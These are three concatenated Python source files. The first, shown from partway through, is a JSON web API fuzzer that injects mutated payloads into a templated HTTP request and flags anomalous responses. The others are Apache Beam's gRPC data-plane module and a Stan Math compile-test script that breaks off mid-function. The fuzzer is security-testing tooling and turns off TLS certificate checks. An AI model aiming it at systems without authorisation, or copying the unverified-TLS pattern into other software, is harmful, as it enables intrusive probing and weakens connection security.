        # Override: record parse errors instead of writing an HTTP response.
        self.error_code = code
        self.error_message = message
    def setbody(self, data):
        # set a custom body (POST); getbody() will lazily re-read it
        self.wfile = StringIO(data)
    def getbody(self):
        # if body is not defined let's read from wfile
        if not self._body:
            self._body = self.wfile.read()
        return self._body
    def tostring(self):
        # convert the object back to a plain http message
        buf = self.raw_requestline
        # emit each header
        for header in self.headers:
            buf += "{0}: {1}\r\n".format(header, self.headers[header])
        buf += "\r\n"
        # append the message body, empty if GET
        buf += self.getbody()
        return buf
def make_request(ip, port, data, secure=False, debug=False):
    """
    Perform the actual request.

    :param ip: address to connect to
    :param port: TCP port
    :param data: HTTPRequestParser instance describing the request
    :param secure: use HTTPS when True
    :param debug: currently unused -- TODO confirm it can be removed
    :return: tuple (response, exec_time); (None, 0.1) on socket errors so
        callers can retry after slowing down
    """
    # should we go ssl?
    try:
        if secure:
            # if we are over ssl but we don't have a standard port let's put it inside url
            if port != 443:
                url = "https://{0}:{1}{2}".format(data.headers["Host"], port, data.path)
            else:
                # otherwise use just https protocol
                url = "https://{0}{1}".format(data.headers["Host"], data.path)
            # connect to the host
            # Disable certificate checking with ssl
            connection = httplib.HTTPSConnection(ip, port, timeout=10, context=ssl._create_unverified_context())
        else:
            # if we are over http but we don't have a standard port let's put it inside url
            if port != 80:
                url = "http://{0}:{1}{2}".format(data.headers["Host"], port, data.path)
            else:
                # otherwise use http protocol
                url = "http://{0}{1}".format(data.headers["Host"], data.path)
            # connect to the host
            connection = httplib.HTTPConnection(ip, port, timeout=10)
        # init the timer in order to get execution time
        start_time = time.time()
        # get the full request body
        d = data.getbody()
        if data.command == "GET":
            connection.request(data.command, url, headers=data.headers)
        else:
            connection.request(data.command, url, d, data.headers)
        # get the execution time aka response time
        exec_time = time.time() - start_time
        response = connection.getresponse()
    # we got an ssl error maybe hello over http port? or port closed
    except ssl.CertificateError:
        raise Exception("SSL certificate error exiting :(")
    # we got a socket error maybe due to timeout or connection reset by peer, we should slow down or quit
    except socket.error:
        return None, 0.1
    # generic exception let's print the message (e.message is Python 2 only)
    except Exception as e:
        raise Exception("Generic error: {0}".format(e.message))
    return response, exec_time
def basic_info(ip, port, data, secure=False):
    """
    Perform one request and gather basic statistics about its response.

    :return: [http_code, response_time, body_length, body_md5], or the
        sentinel [None, 0.0, 0, None] when the request failed.
    """
    response, exec_time = make_request(ip, port, data, secure)
    if response is None:
        # socket-level failure: no stats available
        return [None, 0.0, 0, None]
    body = response.read()
    # (status code, elapsed time, body length, md5 fingerprint of the body)
    return [response.status, exec_time, len(body), hashlib.md5(body).hexdigest()]
def calculate_average_statistics(ip, port, data, secure=False):
    """
    Calculate average stats.

    Performs 5 identical baseline requests and returns
    [http_codes, avg_time, avg_length, hashes]: the distinct HTTP codes seen,
    the mean response time, the mean body length and the distinct body hashes.
    """
    print_queue.put("Performing 5 requests to {0}".format(ip))
    http_code = []
    exec_time = []
    length = []
    hash = []
    for _ in range(0, 5):
        # for each request save http code, response time, body length, body hash
        c, e, l, h = basic_info(ip, port, data, secure)
        http_code.append(c)
        exec_time.append(e)
        length.append(l)
        hash.append(h)
        # sleep to prevent possible API rate limit
        time.sleep(1.5)
    # perform the average calculation over the number of samples actually
    # taken (the previous code divided by a hard-coded 10 while only 5
    # requests are made, halving both averages)
    avghttpcode = ["{0}".format(x) for x in list(set(http_code))]
    avgtime = round(sum(map(float, exec_time)) / len(exec_time), 4)
    avglength = sum(map(int, length)) / len(length)
    avghash = [x for x in list(set(hash))]
    # print the results
    print_queue.put("Average statistics:\n\n"
                    "    HTTP Code: {0}\n"
                    "    Time: {1}\n"
                    "    Length: {2}\n"
                    "    Hash: {3}\n".format(avghttpcode, avgtime, avglength, avghash))
    # return the average stats
    return [avghttpcode, avgtime, avglength, avghash]
def clean_template(data, payload):
    """
    Substitute the ***...*** injection marker with `payload` and return the
    resulting plain-text HTTP request, re-parsed so the body bookkeeping
    (and thus Content-Length handling) is refreshed.
    """
    marker = re.compile("(\*\*\*.*\*\*\*)")
    # replace only the first (and only) injection point
    request_text = marker.sub(payload, data, 1)
    parsed = HTTPRequestParser(request_text)
    # re-setting the body forces the body/stream state to refresh
    parsed.setbody(parsed.getbody())
    return parsed.tostring()
def check_template(data):
    """
    Validate the request template and extract the injection-point payload.

    :param data: plain-text HTTP request containing exactly one ***<json>***
        injection marker
    :return: tuple (payload, encoded) where `encoded` tells whether the JSON
        payload was URL-encoded
    :raises Exception: when the marker is missing, duplicated, or does not
        wrap a JSON object/array
    """
    # Non-greedy match: with the previous greedy "(.*)" two markers such as
    # ***A*** ... ***B*** collapsed into a single match, so duplicated
    # injection points were never reported.
    template_regex = re.compile("\*\*\*(.*?)\*\*\*")
    matches = template_regex.findall(data)
    if len(matches) == 1:
        payload = matches[0]
        # try the payload as plain JSON first
        try:
            j = json.loads(payload)
            # check if it's a valid json container
            if type(j) not in [dict, list]:
                raise Exception("Invalid injection point value (not JSON)!")
            return payload, False
        except Exception:
            # otherwise assume it is URL-encoded JSON
            j = json.loads(urllib.unquote(payload))
            if type(j) not in [dict, list]:
                raise Exception("Invalid injection point value (not JSON)!")
            return payload, True
    # if we got multiple matches notify the user
    elif len(matches) > 1:
        raise Exception("Got multiple injection point on template, please fix")
    # else we miss the injection point entirely
    else:
        raise Exception("Missing injection point on template, please fix")
def merge_stats(stats, global_stats):
    """
    Fold a fuzzed request's stats into the shared baseline so the same
    anomaly is not reported again next time.

    :param stats: [http_code, exec_time, length, hash] of the last request
    :param global_stats: mutable baseline [codes, avg_time, avg_len, hashes]
    """
    code = str(stats[0])
    # remember this status code as already seen
    if code not in global_stats[0]:
        global_stats[0] = global_stats[0] + [code]
    # running average of the response time
    global_stats[1] = (global_stats[1] + stats[1]) / 2
    # running average of the response length
    global_stats[2] = (global_stats[2] + stats[2]) / 2
    # remember this body hash as already seen
    if stats[3] not in global_stats[3]:
        global_stats[3] = global_stats[3] + [stats[3]]
def is_interesting(stats, global_stats, payload, min_difference=2):
    """
    Compare fuzzed input stats against original stats.

    :param stats: [http_code, exec_time, length, hash] of the fuzzed request
    :param global_stats: baseline [codes, avg_time, avg_length, hashes]
    :param payload: the fuzzed payload; its length is the minimum meaningful
        change in response length
    :param min_difference: number of anomalies required to report
    :return: True when the fuzzed response is anomalous enough to report
    """
    # init the difference counter, we need at least min_difference anomalies
    difference_counter = 0
    # get the fuzzed stats
    http_code, exec_time, response_length, response_hash = tuple(stats)
    # HTTP code never seen in the baseline?
    if str(http_code) not in global_stats[0]:
        difference_counter += 1
    # response time differs from the baseline by 5 seconds or more?
    # (the previous check used "<= 5" and therefore fired on *similar*
    # timings, contradicting its own comment)
    if abs(exec_time - global_stats[1]) >= 5:
        difference_counter += 1
    # response length changed by at least the payload length AND the body
    # hash is unseen? weigh it double
    if abs(response_length - global_stats[2]) >= len(payload):
        if response_hash not in global_stats[3]:
            difference_counter += 2
    # interesting when we accumulated enough anomalies
    return difference_counter >= min_difference
def fuzzer_process(ip, port, data, secure=False, max_threads=10, process_queue=None, stats=None, s_fuzz=False):
    """
    Represent a fuzzer process: it starts some threads which do the actual job.

    :param ip: target address
    :param port: target port
    :param data: request template (with ***...*** injection marker)
    :param secure: use HTTPS when True
    :param max_threads: number of worker threads started in this process
    :param process_queue: queue used to report findings to the parent process
    :param stats: shared (Manager-backed) baseline statistics list
    :param s_fuzz: enable PyJFuzz "strong fuzzing" mode
    """
    fuzzer_queue = Queue.Queue(0)
    threads = []
    # serializes access to the shared stats across this process's threads
    global_thread_lock = Lock()
    # check the template and get the original payload
    org_payload, encoded = check_template(data)
    def fuzzer_thread(ip, port, data, secure, stats):
        """
        Represent a nested thread routine: consume fuzzed payloads from
        fuzzer_queue, send them, and report anomalous responses.
        """
        while True:
            # if we got something to process from our parent process let's process it
            while not fuzzer_queue.empty():
                # get the element to fuzz
                fuzzed = fuzzer_queue.get()
                result = [None, 0, 0, None]
                # retry until we got a real result (exec_time > 0)
                while result[1] == 0:
                    # make the actual request and return the stats for the fuzzed request
                    result = basic_info(ip, port, HTTPRequestParser(clean_template(data, fuzzed)), secure)
                    # we really got a result? :D
                    if result[1] > 0:
                        break
                    else:
                        # maybe we are going too fast?
                        time.sleep(2)
                #process_queue.put(result)
                # lock the global stats
                global_thread_lock.acquire()
                # check against stats
                if is_interesting(result, stats, fuzzed):
                    # we got something interesting update global stats
                    merge_stats(result, stats)
                    # we got something interesting let's notify parent process
                    process_queue.put("Got something interesting!\n\n"
                                      "    Payload: {0}\n"
                                      "    HTTP Code: {1}\n"
                                      "    Execution time: {2}\n"
                                      "    Response Length: {3}\n"
                                      "    Response Hash: {4}\n".format(fuzzed, result[0],
                                                                        result[1], result[2], result[3]))
                # unlock the global stats
                global_thread_lock.release()
                # skip to the next element
                fuzzer_queue.task_done()
            # sleep to prevent high CPU usage
            time.sleep(1)
    for _ in range(0, max_threads):
        # start <max_threads> thread which perform the fuzzing job
        threads.append(Thread(target=fuzzer_thread, args=(ip, port, data, secure, stats)))
        threads[-1].start()
    # init PyJFuzz configuration (see documentation)
    config = PJFConfiguration(Namespace(
        json=json.loads(urllib.unquote(org_payload)) if encoded else json.loads(org_payload),
        level=6,
        strong_fuzz=s_fuzz,
        nologo=True,
        debug=False,
        url_encode=encoded,
        recheck_ports=False
    ))
    # init the object factory used to fuzz (see documentation)
    factory = PJFFactory(config)
    # producer loop: feed freshly fuzzed payloads to the worker threads
    while True:
        try:
            # send the fuzzed input to the global thread queue
            fuzzer_queue.put(factory.fuzzed)
            # sleep to prevent high cpu usage
            time.sleep(0.1)
        except:
            # if something wrong happens just exit the process
            break
    exit(0)
def start_processes(ip, port, data, secure, process_queue, stats, process_num=5, threads_per_process=10, strong_fuzz=False):
    """
    Spawn the fuzzer worker processes and return them as a pool.

    :param process_queue: queue used by workers to report findings
    :param stats: baseline statistics, copied into a Manager-backed list so
        all processes share (and update) the same baseline
    :return: list of started multiprocessing.Process objects
    """
    # declare a process pool
    process_pool = []
    # init a process manager used to share stats between processes in order
    # to avoid reporting the same result multiple times
    manager_stats = multiprocessing.Manager().list()
    for item in stats:
        manager_stats.append(item)
    # create <process_num> processes; use a named loop variable since its
    # value is reported below (it was previously the throwaway "_")
    for process_number in range(1, process_num + 1):
        process_pool.append(multiprocessing.Process(target=fuzzer_process,
                                                    args=(ip,
                                                          port,
                                                          data,
                                                          secure,
                                                          threads_per_process,
                                                          process_queue,
                                                          manager_stats,
                                                          strong_fuzz)))
        # start the created process
        process_pool[-1].start()
        print_queue.put("Process {0} started!".format(process_number))
    # return the process pool
    return process_pool
def bye():
    """Pause briefly so the printer thread can flush its last messages."""
    time.sleep(1)
#def main(ip, port, data, secure=False, process_num=10, threads_per_process=10, strong_fuzz=False):
def main(config):
    """
    Main routine doing the hard job.

    :param config: namespace with attributes host, port, data (the request
        template), secure, process_num, thread_num and strong_fuzz -- see
        the argument parser at the bottom of this file.
    """
    # init the printer thread
    init_printer()
    print_queue.put("Starting PyJFAPI...")
    # test the injection template for errors
    try:
        check_template(config.data)
    except Exception as e:
        print_queue.put("Template error: {0}".format(e))
        return bye()
    # notify the user about injection point
    print_queue.put("Injection point found: {0}".format(check_template(config.data)[0]))
    # calculate initial request statistics
    try:
        # parse the request without injection marker
        parsed = HTTPRequestParser(clean_template(config.data, check_template(config.data)[0]))
        # perform several baseline requests and calculate average statistics
        statistics = calculate_average_statistics(config.host, config.port, parsed, config.secure)
        # if we don't have stats, quit (check hashes)!
        if None in statistics[3]:
            print_queue.put("Unable to retrieve stats :(")
            return bye()
    # ooops something wrong happened let's notify the user
    except Exception as e:
        print_queue.put(e)
        return bye()
    # ctrl+c during the baseline phase: just quit
    # (KeyboardInterrupt is not an Exception subclass, so this is reachable)
    except KeyboardInterrupt:
        return
    # create a Queue used to communicate results between created processes and main process
    process_queue = multiprocessing.Queue(0)
    # let's notify the user that we are starting the real fuzzing now!
    print_queue.put("Start fuzzing in a few seconds...")
    # start processes and return a process pool
    process_pool = start_processes(config.host, config.port, config.data, config.secure, process_queue, statistics,
                                   config.process_num, config.thread_num, config.strong_fuzz)
    while True:
        try:
            while not process_queue.empty():
                # if queue is not empty we have some results from a process let's print it by adding it to print_queue
                print_queue.put(process_queue.get())
            # sleep to prevent high CPU usage
            time.sleep(0.1)
        except KeyboardInterrupt:
            # we got ctrl+c so let's kill all processes
            print_queue.put("Killing all processes, please wait...")
            for process in process_pool:
                # Send sigkill to each process
                os.kill(process.pid, signal.SIGKILL)
            # exit the loop
            break
    return bye()
def fix_request(req):
    """
    Normalize line endings of a pasted HTTP request.

    Requests copied from a browser developer console or BurpSuite often use
    bare \n instead of \r\n; restore CRLF endings in that case.
    """
    if "\r\n" in req:
        # already CRLF-delimited, leave it alone
        return req
    return req.replace("\n", "\r\n")
def check_template_path(path):
    """
    Argument checker: verify the template file exists and return its content.

    :param path: filesystem path of the request template
    :raises argparse.ArgumentTypeError: if the file cannot be opened or read
    """
    try:
        with open(path) as template:
            return template.read()
    except (IOError, OSError):
        # Only trap filesystem errors; the previous bare except also
        # swallowed KeyboardInterrupt/SystemExit during argument parsing.
        raise argparse.ArgumentTypeError("Invalid template path!")
if __name__ == "__main__":
    # Command line interface: the parsed options are forwarded to main().
    parser = argparse.ArgumentParser()
    parser.add_argument('-H', type=str, metavar="HOST", help="The hostname", required=True, dest="host")
    parser.add_argument('-P', type=int, metavar="PORT", help="Connection port", required=True, dest="port")
    # -T validates the path and loads the template content (see check_template_path)
    parser.add_argument('-T', type=check_template_path, metavar="REQUEST TEMPLATE",
                        help="Request template used for fuzzing", required=True, dest="template")
    parser.add_argument('--s', default=False, help="Use strong fuzzing", action="store_true", dest="strong_fuzz")
    parser.add_argument('--p', type=int, default=1, metavar="PROCESS NUMBER", help="Number of process to start",
                        dest="process_num")
    parser.add_argument('--t', type=int, default=10, metavar="THREAD NUMBER", help="Number of thread for each process",
                        dest="thread_num")
    parser.add_argument('--ssl', default=False, help="Use ssl handshake just for https requests", action="store_true",
                        dest="secure")
    args = parser.parse_args()
    # normalize the template's line endings and attach it as args.data
    setattr(args, "data", fix_request(args.template))
    main(args)
|
data_plane.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of DataChannels for communicating across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import queue
import sys
import threading
from builtins import object
from builtins import range
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
# This module is experimental. No backwards-compatibility guarantees.
_DEFAULT_FLUSH_THRESHOLD = 10 << 20 # 10MB
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
  """A Outputstream for use with CoderImpls that has a close() method."""

  def __init__(self,
               close_callback=None,
               flush_callback=None,
               flush_threshold=_DEFAULT_FLUSH_THRESHOLD):
    super(ClosableOutputStream, self).__init__()
    # Invoked with the remaining buffered bytes when the stream is closed.
    self._close_callback = close_callback
    # Invoked with the buffered bytes once the buffer grows past threshold.
    self._flush_callback = flush_callback
    self._flush_threshold = flush_threshold

  # This must be called explicitly to avoid flushing partial elements.
  def maybe_flush(self):
    if not self._flush_callback:
      return
    if self.size() > self._flush_threshold:
      self._flush_callback(self.get())
      self._clear()

  def close(self):
    if self._close_callback:
      self._close_callback(self.get())
class DataChannel(with_metaclass(abc.ABCMeta, object)):
  """Represents a channel for reading and writing data over the data plane.

  Read from this channel with the input_elements method::

    for elements_data in data_channel.input_elements(instruction_id, targets):
      [process elements_data]

  Write to this channel using the output_stream method::

    out1 = data_channel.output_stream(instruction_id, target1)
    out1.write(...)
    out1.close()

  When all data for all instructions is written, close the channel::

    data_channel.close()
  """

  @abc.abstractmethod
  def input_elements(
      self, instruction_id, expected_targets, abort_callback=None):
    """Returns an iterable of all Element.Data bundles for instruction_id.

    This iterable terminates only once the full set of data has been received
    for each of the expected targets. It may block waiting for more data.

    Args:
        instruction_id: which instruction the results must belong to
        expected_targets: which targets to wait on for completion
        abort_callback: a callback to invoke if blocking returning whether
            to abort before consuming all the data
    """
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def output_stream(self, instruction_id, target):
    """Returns an output stream writing elements to target.

    Args:
        instruction_id: which instruction this stream belongs to
        target: the target of the returned stream
    """
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def close(self):
    """Closes this channel, indicating that all data has been written.

    Data can continue to be read.

    If this channel is shared by many instructions, should only be called on
    worker shutdown.
    """
    raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
  """An in-memory implementation of a DataChannel.

  This channel is two-sided. What is written to one side is read by the
  other. The inverse() method returns the other side of a instance.
  """

  def __init__(self, inverse=None):
    # Elements written to the *other* side end up in this list.
    self._inputs = []
    self._inverse = inverse or InMemoryDataChannel(self)

  def inverse(self):
    return self._inverse

  def input_elements(self, instruction_id, unused_expected_targets=None,
                     abort_callback=None):
    remaining = []
    for elements_data in self._inputs:
      if elements_data.instruction_reference != instruction_id:
        # Belongs to a different instruction: keep it for later.
        remaining.append(elements_data)
      elif elements_data.data:
        # Matching, non-empty element; empty ones (end-of-stream) are dropped.
        yield elements_data
    self._inputs = remaining

  def output_stream(self, instruction_id, target):
    def add_to_inverse_output(data):
      self._inverse._inputs.append(  # pylint: disable=protected-access
          beam_fn_api_pb2.Elements.Data(
              instruction_reference=instruction_id,
              target=target,
              data=data))
    # Both flushing and closing deliver the bytes to the other side.
    return ClosableOutputStream(
        add_to_inverse_output, flush_callback=add_to_inverse_output)

  def close(self):
    # Nothing to release for an in-memory channel.
    pass
class _GrpcDataChannel(DataChannel):
  """Base class for implementing a BeamFnData-based DataChannel.

  Outgoing elements are buffered in ``_to_send`` and drained by
  ``_write_outputs``; incoming elements are demultiplexed per instruction id
  into ``_received`` queues by a background reader thread (``_read_inputs``).
  """

  # Sentinel queued by close() telling _write_outputs() to finish.
  _WRITES_FINISHED = object()

  def __init__(self):
    # Elements waiting to be sent over the wire.
    self._to_send = queue.Queue()
    # instruction_id -> queue of received Elements.Data.
    self._received = collections.defaultdict(queue.Queue)
    self._receive_lock = threading.Lock()
    self._reads_finished = threading.Event()
    self._closed = False
    # Exception info captured by the reader thread, re-raised to consumers.
    self._exc_info = None

  def close(self):
    self._to_send.put(self._WRITES_FINISHED)
    self._closed = True

  def wait(self, timeout=None):
    # Block until the reader thread has finished (or the timeout elapses).
    self._reads_finished.wait(timeout)

  def _receiving_queue(self, instruction_id):
    with self._receive_lock:
      return self._received[instruction_id]

  def _clean_receiving_queue(self, instruction_id):
    with self._receive_lock:
      self._received.pop(instruction_id)

  def input_elements(self, instruction_id, expected_targets,
                     abort_callback=None):
    """
    Generator to retrieve elements for an instruction_id
    input_elements should be called only once for an instruction_id

    Args:
      instruction_id(str): instruction_id for which data is read
      expected_targets(collection): expected targets
      abort_callback(callable): polled while blocked; return True to abort
    """
    received = self._receiving_queue(instruction_id)
    done_targets = []
    abort_callback = abort_callback or (lambda: False)
    try:
      while len(done_targets) < len(expected_targets):
        try:
          data = received.get(timeout=1)
        except queue.Empty:
          if self._closed:
            raise RuntimeError('Channel closed prematurely.')
          if abort_callback():
            return
          if self._exc_info:
            t, v, tb = self._exc_info
            raise_(t, v, tb)
        else:
          # An empty data payload marks end-of-stream for its target.
          if not data.data and data.target in expected_targets:
            done_targets.append(data.target)
          else:
            assert data.target not in done_targets
            yield data
    finally:
      # Instruction_ids are not reusable so clean the queue once we are done
      # with an instruction_id.
      self._clean_receiving_queue(instruction_id)

  def output_stream(self, instruction_id, target):
    def add_to_send_queue(data):
      if data:
        self._to_send.put(
            beam_fn_api_pb2.Elements.Data(
                instruction_reference=instruction_id,
                target=target,
                data=data))
    def close_callback(data):
      add_to_send_queue(data)
      # End of stream marker.
      self._to_send.put(
          beam_fn_api_pb2.Elements.Data(
              instruction_reference=instruction_id,
              target=target,
              data=b''))
    return ClosableOutputStream(
        close_callback, flush_callback=add_to_send_queue)

  def _write_outputs(self):
    # Generator of batched Elements messages; ends after close() is called.
    done = False
    while not done:
      data = [self._to_send.get()]
      try:
        # Coalesce up to 100 other items.
        for _ in range(100):
          data.append(self._to_send.get_nowait())
      except queue.Empty:
        pass
      if data[-1] is self._WRITES_FINISHED:
        done = True
        data.pop()
      if data:
        yield beam_fn_api_pb2.Elements(data=data)

  def _read_inputs(self, elements_iterator):
    # TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
    try:
      for elements in elements_iterator:
        for data in elements.data:
          self._receiving_queue(data.instruction_reference).put(data)
    except:  # pylint: disable=bare-except
      if not self._closed:
        logging.exception('Failed to read inputs in the data plane')
        # Surface the failure to blocked input_elements() callers.
        self._exc_info = sys.exc_info()
        raise
    finally:
      self._closed = True
      self._reads_finished.set()

  def _start_reader(self, elements_iterator):
    # Daemon thread: must not keep the worker alive at shutdown.
    reader = threading.Thread(
        target=lambda: self._read_inputs(elements_iterator),
        name='read_grpc_client_inputs')
    reader.daemon = True
    reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
  """A DataChannel wrapping the client side of a BeamFnData connection."""

  def __init__(self, data_stub):
    super(GrpcClientDataChannel, self).__init__()
    # Open the bidirectional stream: outgoing elements come from
    # _write_outputs(); incoming elements are consumed by the reader thread.
    self._start_reader(data_stub.Data(self._write_outputs()))
class GrpcServerDataChannel(
    beam_fn_api_pb2_grpc.BeamFnDataServicer, _GrpcDataChannel):
  """A DataChannel wrapping the server side of a BeamFnData connection."""

  def Data(self, elements_iterator, context):
    # Consume the client's stream on a background thread while yielding our
    # own outgoing elements as the RPC response stream.
    self._start_reader(elements_iterator)
    for elements in self._write_outputs():
      yield elements
class DataChannelFactory(with_metaclass(abc.ABCMeta, object)):
  """An abstract factory for creating ``DataChannel``."""

  @abc.abstractmethod
  def create_data_channel(self, remote_grpc_port):
    """Returns a ``DataChannel`` from the given RemoteGrpcPort."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def close(self):
    """Close all channels that this factory owns."""
    raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
  """A factory for ``GrpcClientDataChannel``.

  Caches the created channels by ``data descriptor url``.
  """

  def __init__(self, credentials=None):
    # url -> GrpcClientDataChannel
    self._data_channel_cache = {}
    # Guards channel creation so concurrent callers share one channel per url.
    self._lock = threading.Lock()
    self._credentials = credentials
    if credentials is not None:
      logging.info('Using secure channel creds.')

  def create_data_channel(self, remote_grpc_port):
    """Returns a (cached) ``GrpcClientDataChannel`` for the port's url."""
    url = remote_grpc_port.api_service_descriptor.url
    if url not in self._data_channel_cache:
      with self._lock:
        # Re-check under the lock so only one thread creates the channel.
        if url not in self._data_channel_cache:
          logging.info('Creating channel for %s', url)
          # Options to have no limits (-1) on the size of the messages
          # received or sent over the data plane. The actual buffer size
          # is controlled in a layer above.
          channel_options = [("grpc.max_receive_message_length", -1),
                             ("grpc.max_send_message_length", -1)]
          if self._credentials is None:
            grpc_channel = GRPCChannelFactory.insecure_channel(
                url, options=channel_options)
          else:
            grpc_channel = GRPCChannelFactory.secure_channel(
                url, self._credentials, options=channel_options)
          # Add workerId to the grpc channel
          grpc_channel = grpc.intercept_channel(grpc_channel,
                                                WorkerIdInterceptor())
          self._data_channel_cache[url] = GrpcClientDataChannel(
              beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel))
    return self._data_channel_cache[url]

  def close(self):
    """Close all channels that this factory owns."""
    logging.info('Closing all cached grpc data channels.')
    # Only the channels are needed, so iterate values() rather than items().
    for channel in self._data_channel_cache.values():
      channel.close()
    self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
  """A singleton factory for ``InMemoryDataChannel``."""

  def __init__(self, in_memory_data_channel):
    # The single channel handed out to every caller.
    self._in_memory_data_channel = in_memory_data_channel

  def create_data_channel(self, unused_remote_grpc_port):
    # The port is ignored: all callers share the same in-memory channel.
    return self._in_memory_data_channel

  def close(self):
    # Nothing to release for an in-memory channel.
    pass
|
varmat_compatibility.py | #!/usr/bin/python
import itertools
import json
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser
import os
import Queue
import subprocess
import re
import sys
import tempfile
import threading
from sig_utils import make, handle_function_list, get_signatures
from signature_parser import SignatureParser
from code_generator import CodeGenerator
# Location of this script and the repository test/ folder (so the helper
# modules imported above resolve when run from anywhere).
HERE = os.path.dirname(os.path.realpath(__file__))
TEST_FOLDER = os.path.abspath(os.path.join(HERE, "..", "test"))
sys.path.append(TEST_FOLDER)
# Folder where generated .cpp test files are written and compiled.
WORKING_FOLDER = "test/varmat-compatibility"
# C++ scaffold wrapped around each generated signature test body.
TEST_TEMPLATE = """
static void {test_name}() {{
{code}
}}
"""
def run_command(command):
    """
    Runs given command and waits until it finishes executing.

    :param command: command to execute (argv list)
    :return: tuple (success, stdout, stderr) where success is True when the
        command exited with status 0
    """
    proc = subprocess.Popen(command, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
    stdout, stderr = proc.communicate()
    # communicate() has reaped the process, so returncode is now populated
    return (proc.returncode == 0, stdout, stderr)
def build_signature(prefix, cpp_code, debug):
    """
    Try to build the given cpp code.

    Returns True if the code compiled successfully.

    :param prefix: prefix for generated file names (eases debugging)
    :param cpp_code: code to compile
    :param debug: if True, keep temporary files for failed builds
    """
    source_file = tempfile.NamedTemporaryFile(
        "w", dir=WORKING_FOLDER, prefix=prefix + "_",
        suffix="_test.cpp", delete=False)
    source_file.write("#include <test/expressions/expression_test_helpers.hpp>\n\n")
    source_file.write(cpp_code)
    source_file.close()

    cpp_path = os.path.join(WORKING_FOLDER, os.path.basename(source_file.name))
    object_path = cpp_path.replace(".cpp", ".o")
    dependency_path = cpp_path.replace(".cpp", ".d")
    stdout_path = cpp_path.replace(".cpp", ".stdout")
    stderr_path = cpp_path.replace(".cpp", ".stderr")

    successful, stdout, stderr = run_command([make, object_path])

    if successful or not debug:
        # Build artifacts are not interesting; clean up best-effort.
        for leftover in (cpp_path, dependency_path, object_path):
            try:
                os.remove(leftover)
            except OSError:
                pass
    elif debug:
        # Failed build in debug mode: keep the source and dump the
        # compiler output next to it for inspection.
        with open(stdout_path, "w") as stdout_f:
            stdout_f.write(stdout.decode("utf-8"))
        with open(stderr_path, "w") as stderr_f:
            stderr_f.write(stderr.decode("utf-8"))

    return successful
def main(functions_or_sigs, results_file, cores, debug):
    """
    Attempt to build all the signatures in functions_or_sigs, or all the signatures
    associated with all the functions in functions_or_sigs, or if functions_or_sigs
    is empty every signature the stanc3 compiler exposes.

    Results are written to a results json file. Individual signatures are classified
    as either compatible, incompatible, or irrelevant.

    Compatible signatures can be compiled with varmat types in every argument that
    could possibly be a varmat (the matrix-like ones).

    Incompatible signatures cannot all be built, and for irrelevant signatures it does
    not make sense to try to build them (there are no matrix arguments, or the function
    does not support reverse mode autodiff, etc).

    Compilation is done in parallel using the number of specified cores.

    :param functions_or_sigs: List of function names and/or signatures to benchmark
    :param results_file: File to use as a results cache
    :param cores: Number of cores to use for compiling
    :param debug: If true, don't delete temporary files
    """
    all_signatures = get_signatures()
    functions, signatures = handle_function_list(functions_or_sigs)
    requested_functions = set(functions)

    compatible_signatures = set()
    incompatible_signatures = set()
    irrelevant_signatures = set()

    # Read the arguments and figure out the exact list of signatures to test
    signatures_to_check = set()
    for signature in all_signatures:
        sp = SignatureParser(signature)
        if len(requested_functions) > 0 and sp.function_name not in requested_functions:
            continue
        signatures_to_check.add(signature)

    work_queue = Queue.Queue()

    # For each signature, generate cpp code to test
    for signature in signatures_to_check:
        sp = SignatureParser(signature)

        if sp.is_high_order():
            # No code can be generated for higher-order functions; queue them
            # with cpp_code=None so the worker classifies them without trying
            # to compile. (The original code referenced an undefined name `n`
            # here, raising NameError for every high-order signature.)
            work_queue.put((work_queue.qsize(), signature, None))
            continue

        cpp_code = ""
        any_overload_uses_varmat = False
        for m, overloads in enumerate(itertools.product(("Prim", "Rev", "RevVarmat"), repeat=sp.number_arguments())):
            cg = CodeGenerator()

            arg_list_base = cg.build_arguments(sp, overloads, size=1)

            # Promote varmat-compatible reverse-mode args to var_value types.
            arg_list = []
            for overload, arg in zip(overloads, arg_list_base):
                if arg.is_reverse_mode() and arg.is_varmat_compatible() and overload.endswith("Varmat"):
                    any_overload_uses_varmat = True
                    arg = cg.to_var_value(arg)
                arg_list.append(arg)

            cg.function_call_assign("stan::math::" + sp.function_name, *arg_list)

            cpp_code += TEST_TEMPLATE.format(
                test_name=sp.function_name + repr(m),
                code=cg.cpp(),
            )

        if any_overload_uses_varmat:
            work_queue.put((work_queue.qsize(), signature, cpp_code))
        else:
            # Nothing varmat-shaped in any overload: not worth compiling.
            print("{0} ... Irrelevant".format(signature.strip()))
            irrelevant_signatures.add(signature)

    output_lock = threading.Lock()

    if not os.path.exists(WORKING_FOLDER):
        os.mkdir(WORKING_FOLDER)

    work_queue_original_length = work_queue.qsize()

    # Test if each cpp file builds and update the output file
    # This part is done in parallel
    def worker():
        while True:
            try:
                n, signature, cpp_code = work_queue.get(False)
            except Queue.Empty:
                return  # If queue is empty, worker quits

            try:
                if cpp_code is None:
